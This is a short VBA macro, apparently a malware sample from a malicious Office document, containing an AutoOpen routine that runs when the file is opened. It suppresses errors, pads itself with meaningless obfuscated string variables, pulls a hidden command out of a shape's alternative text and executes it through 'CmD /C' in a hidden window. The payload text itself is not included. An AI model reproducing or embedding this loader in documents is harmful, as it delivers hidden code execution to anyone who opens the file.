Sub AutoOpen()
On Error Resume Next
' STRIPPED LINE
' STRIPPED LINE
' STRIPPED LINE
' STRIPPED LINE
' STRIPPED LINE
' STRIPPED LINE
' STRIPPED LINE
' STRIPPED LINE
rjvFRbqzLtkzn = "" + ""
' STRIPPED LINE
' STRIPPED LINE
' STRIPPED LINE
' STRIPPED LINE
' STRIPPED LINE
SKKdjMpgJRQRK = "" + "" + Trim("")
' STRIPPED LINE
' STRIPPED LINE
' STRIPPED LINE
' STRIPPED LINE
hdNxDVBxCTqQTpB = LTrim("")
' STRIPPED LINE
' STRIPPED LINE
' STRIPPED LINE
' STRIPPED LINE
' STRIPPED LINE
RJzJQGRzrc = ""
' STRIPPED LINE
' STRIPPED LINE
' STRIPPED LINE
' STRIPPED LINE
' STRIPPED LINE
CWflqnrJbKVBj = RTrim("") + ""
' STRIPPED LINE
' STRIPPED LINE
' STRIPPED LINE
Set pNHbvwXpnbZvS = Shapes(Trim("h9mkae7"))
' STRIPPED LINE
' STRIPPED LINE
VBA.Shell# "CmD /C " + Trim(rjvFRbqzLtkzn) + SKKdjMpgJRQRK + Trim(Replace(pNHbvwXpnbZvS.AlternativeText + "", "[", "A")) + hdNxDVBxCTqQTpB + RJzJQGRzrc + CWflqnrJbKVBj, CInt(351 * 2 + -702)
' STRIPPED LINE
' STRIPPED LINE
' STRIPPED LINE
' STRIPPED LINE
' STRIPPED LINE
' STRIPPED LINE
' STRIPPED LINE
' STRIPPED LINE
End Sub

